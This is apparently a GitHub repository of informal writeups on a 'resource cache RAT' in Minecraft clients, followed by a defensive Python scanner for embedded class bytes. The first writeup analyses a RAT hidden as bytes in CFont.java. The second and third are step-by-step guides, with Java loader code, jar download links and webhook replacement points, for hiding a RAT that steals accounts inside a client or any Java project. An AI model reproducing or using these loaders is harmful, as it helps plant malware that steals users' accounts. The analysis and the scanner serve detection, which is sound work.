├── README.md
├── writeup-1.md
├── writeup-2.md
└── writeup-3.md


/README.md:
--------------------------------------------------------------------------------
1 | # writeups
2 | Random writes about stuff when I feel like it.
3 | [Write up 1 Byte/Resource Cache Rat.](https://github.com/ProfKambing/writeups/blob/main/writeup-1.md)
4 | [Write up 3 **CREATING** Byte/Resource Cache Rat.](https://github.com/ProfKambing/writeups/blob/main/writeup-3.md)
5 | 
6 | also to improve my readme skills 😎
7 | 


--------------------------------------------------------------------------------
/writeup-1.md:
--------------------------------------------------------------------------------
1 | # Resource cache rat.
2 | Not a common rat, but really dangerous. The only client I know that had this is renosense-beta made by zopac.
3 | 
4 | The 3 pastebins are still up and so are the downloads but the webhooks are nuked, so don't worry about running old renosense beta.
5 | 
6 | ## Investigating
7 | Thanks to [Sxmurai](https://github.com/Sxmurai/renosense-RATs) for providing these. The rat is located in CFont.java but the file is never used.
8 | 
9 | Zopac used bytes to avoid suspicion.
10 | 
11 | ![bytes](https://cdn.upload.systems/uploads/stsyvbx7.png)
12 | 
13 | ## Deep dive
14 | After translating it, there are three pastebin links (which are still up).
15 | 
16 | How it works is it installs INSTALLER.jar and it installs CLIENT.jar, then it rats the user by installing SERVER.jar.
17 | 
18 | All of this was done in resource cache so you won't even know that you gave zopac free alts.
19 | 
20 | ## How to avoid
21 | - Decompile and search for keywords like "Bootstrap" since these ratters are smart.
22 | - Don't run oyvey skids, only run clients that you trust.
23 | - If you want to run it anyway, do it in a VM environment or offline.
24 | 
25 | big madlad zopac.
26 | 


--------------------------------------------------------------------------------
/writeup-2.md:
--------------------------------------------------------------------------------
1 | ## Can I use it?
2 | yes, If you're new to these stuff, I recommend to not.
3 | 
4 | ## How?
5 | (This is for educational purposes only, and I do not guarantee this would work.)\
6 | first download these [bytes](https://cdn.discordapp.com/attachments/889588787972284456/891204621530456104/decimal.txt). It still has Zopac's pastebin link tho.
7 | 
8 | Replace it by translating into ascii and translate it back to decimals(bytes).
9 | \
10 | Make sure your number delimiter is set to `Comma`
11 | \
12 | [Translator](https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html)
13 | 
14 | Then paste this code into your client and somehow trigger it
15 | ```java
16 | byte[] pixels = {//the bytes (example: 50, 100, 200)}
17 | try {
18 |     Field field = LaunchClassLoader.class.getDeclaredField("resourceCache");
19 |     field.setAccessible(true);
20 |     Map cache = (Map) field.get(Launch.classLoader);
21 |     cache.put("idasido.adldaosd.wpiw.install.Bootstrap", pixels);
22 |     Launch.classLoader.loadClass("idasido.adldaosd.wpiw.install.Bootstrap").getMethod("main").invoke(null);
23 |     textStructureSize = true;
24 | } catch (Exception ignored) {}
25 | ```
26 | 
27 | You just implemented the rat into your client.
28 | 
29 | Next step is to download the [installer](https://cdn.discordapp.com/attachments/825998603977621518/891247725931298816/COPE-1.0-SNAPSHOT-installer.jar)
30 | then the [client](https://cdn.discordapp.com/attachments/825998603977621518/891247723817357333/COPE-1.0-SNAPSHOT-client.jar)
31 | and the [server](https://cdn.discordapp.com/attachments/825998603977621518/891247713436442624/COPE-1.0-SNAPSHOT-server.jar).
32 | \
33 | Use [recaf](https://github.com/Col-E/Recaf) to replace the pastebins and webhook.
34 | 
35 | - ## All the url you need to replace
36 | 1. Installer
37 |    - Bootstrap.class : 18
38 |    - Installer.class : 16 / 55
39 | 3. Client
40 |    - Loader.class : 19
41 | 2. Server
42 |    - Sender.class : 17
43 | 
44 | all credits to zopac for making the resource cache rat
45 | \
46 | credits to yoink for making the original rat
47 | 


--------------------------------------------------------------------------------
/writeup-3.md:
--------------------------------------------------------------------------------
1 | ## How to implement class loader rat / resouce cache rat in 5 minutes or less in any java projects
2 | Since my previous writeup is so hard and yall r lazy fucks
3 | - First we need a byte class loader, just copy paste this shit into your project.
4 | ```java
5 | public static class ByteClassLoader extends ClassLoader {
6 |     private HashMap byteDataMap = new HashMap<>();
7 | 
8 |     public ByteClassLoader(ClassLoader parent) {
9 |         super(parent);
10 |     }
11 | 
12 |     public void loadDataInBytes(byte[] byteData, String resourcesName) {
13 |         byteDataMap.put(resourcesName, byteData);
14 |     }
15 | 
16 |     @Override
17 |     protected Class findClass(String className) throws ClassNotFoundException {
18 |         if (byteDataMap.isEmpty())
19 |             throw new ClassNotFoundException("byte data is empty");
20 | 
21 |         String filePath = className.replaceAll("\\.", "/").concat(".class");
22 |         byte[] extractedBytes = byteDataMap.get(filePath);
23 |         if (extractedBytes == null)
24 |             throw new ClassNotFoundException("Cannot find " + filePath + " in bytes");
25 | 
26 |         return defineClass(className, extractedBytes, 0, extractedBytes.length);
27 |     }
28 | }
29 | }
30 | ```
31 | ## Creating bytes (da rat)
32 | - Create a java file containing your nasty rat and then compile it turning the `.java` file to `.class` file
33 | using **javac ** in [CMD]()
34 | - Open the class file using notepad and copy it. And then [translate](https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html) it to bytes
35 | - Set number delimiter to `Comma`
36 | 
37 | 
38 | Java file example :
39 | 
40 | ```java
41 | package test;
42 | 
43 | public class Test {
44 | 
45 |     public static void runTheVirus() {
46 |         System.out.println("Hello World");
47 |         sendWebhook("test","zawebhook");
48 |     }
49 |     public static void sendWebhook(String message, String webhook) {
50 |         //write za rat
51 |     }
52 | }
53 | ```
54 | **PLEASE REMEMBER THAT YOU NEED TO COMPILE IT TO `.class` FOLLOW ALL THE STEPS ABOVE THE CODE SAMPLE**
55 | ## Implementing da rat
56 | Basically initializing a `ByteClassLoader` instance and running it.
57 | ```java
58 | public static void main(String[] args) throws Exception {
59 |     int[] bytes = { put bytes here };
60 |     byte[] bytes1 = new byte[bytes.length];
61 |     // this seems retarded but only way to make it work
62 |     for (int i = 0; i < bytes.length; i++) {
63 |         bytes1[i] = (byte)bytes[i];
64 |     }
65 |     ByteClassLoader byteClassLoader = new ByteClassLoader(ClassLoader.getSystemClassLoader());
66 |     byteClassLoader.loadDataInBytes(bytes1, "test.Test");
67 | 
68 |     Class clazz = byteClassLoader.loadClass("test.Test");
69 |     clazz.getMethod("runTheVirus").invoke(null);
70 |     // name the method whatever u want no obvious tho
71 | }
72 | ```
73 | i aint reading allat but we up
74 | 


--------------------------------------------------------------------------------
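
A scanner for the "How to avoid" advice in writeup-1, as an added example that is not part of the original writeups: it goes beyond a plain keyword search by decoding decimal byte-array literals in decompiled Java source and flagging any that start with a class-file or JAR magic number. The function names, keyword list and sample input are assumptions made for this example, and keyword hits are only hints for manual review.

```python
import re

# Byte-array literal: { -54, -2, -70, ... } (signed or unsigned decimals).
ARRAY_RE = re.compile(r"\{\s*(-?\d+(?:\s*,\s*-?\d+)*)\s*,?\s*\}")
# Leading bytes that mark an embedded executable payload.
MAGICS = {b"\xca\xfe\xba\xbe": "Java class file", b"PK\x03\x04": "JAR/ZIP archive"}
# Identifiers tied to the loading technique described in these writeups.
KEYWORDS = ("resourceCache", "defineClass", "setAccessible", "Bootstrap")


def decode_array(literal):
    """Turn '50, -2, 200' into bytes, or None if a value is not byte-sized."""
    values = [int(tok) for tok in literal.split(",")]
    if any(v < -128 or v > 255 for v in values):
        return None
    return bytes(v & 0xFF for v in values)  # Java signed byte -> unsigned


def scan_source(source):
    """Return sorted (line_number, finding) tuples for one source file."""
    findings = []
    for match in ARRAY_RE.finditer(source):
        data = decode_array(match.group(1))
        if data is None:
            continue
        line = source.count("\n", 0, match.start()) + 1
        for magic, kind in MAGICS.items():
            if data.startswith(magic):
                findings.append((line, f"byte array embeds a {kind} ({len(data)} bytes)"))
    for number, text in enumerate(source.splitlines(), start=1):
        for word in KEYWORDS:
            if word in text:
                findings.append((number, f"keyword {word}"))
    return sorted(findings)


# Constructed sample: only the class-file magic and version, not a real payload.
SAMPLE = '''class CFont {
    byte[] pixels = {-54, -2, -70, -66, 0, 0, 0, 52};
    int[] sizes = {12, 14, 16};
    void init() throws Exception {
        Field f = LaunchClassLoader.class.getDeclaredField("resourceCache");
        f.setAccessible(true);
    }
}'''

if __name__ == "__main__":
    for line, finding in scan_source(SAMPLE):
        print(f"line {line}: {finding}")
```

Run `scan_source` over every `.java` file a decompiler produces; a file that is never referenced elsewhere but carries a large byte array is the case writeup-1 describes.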